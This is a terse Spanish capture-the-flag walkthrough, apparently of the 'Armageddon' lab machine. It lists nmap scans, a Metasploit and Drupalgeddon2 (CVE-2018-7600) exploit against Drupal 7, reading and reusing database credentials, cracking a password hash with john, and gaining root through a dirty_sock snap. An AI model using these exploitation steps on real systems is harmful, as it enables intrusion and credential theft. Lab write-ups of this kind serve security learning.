Cu3rv0x

nmap -sC -sV -O -p- -oA armageddon 10.129.182.137

nmap -sU -O -p- -oA armageddon-udp 10.129.182.137

Nos dirigimos a la pagina web http:10.129.182.137

Pasted image 20210712124226.png

Es una pagina en Drupal 7

Pasted image 20210712124205.png

Iniciamos metasploit y hacemos un search drupal

msf6> search drupal

msf6>use 1

msf6>set LHOST tun0

msf6>set RHOST 10.129.182.137

msf6> run

Pasted image 20210712154848.png

https://github.com/pimps/CVE-2018-7600

python3 drupal7-CVE-2018-7600.py http://10.129.182.137/ -c 'cat sites/default/settings'

Pasted image 20210712134901.png

Conseguimos las credenciales

Pasted image 20210712134835.png

mysql -udrupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select name,pass from users;'

Pasted image 20210712142638.png

Copiamos el hash a un archivo llamado armageddon_hash

john armageddon_hash

Pasted image 20210712142843.png

Adquirimos el password

Pasted image 20210712143204.png

ssh brucetherealadmin@10.129.182.137

https://github.com/initstring/dirty_sock/

Pasted image 20210712172932.png

sudo /usr/bin/snap install — devmode new.snap

su dirty_sock

sudo -i

Introducimos la contrasena de nuevo:

dirty_sock

Pasted image 20210713065403.png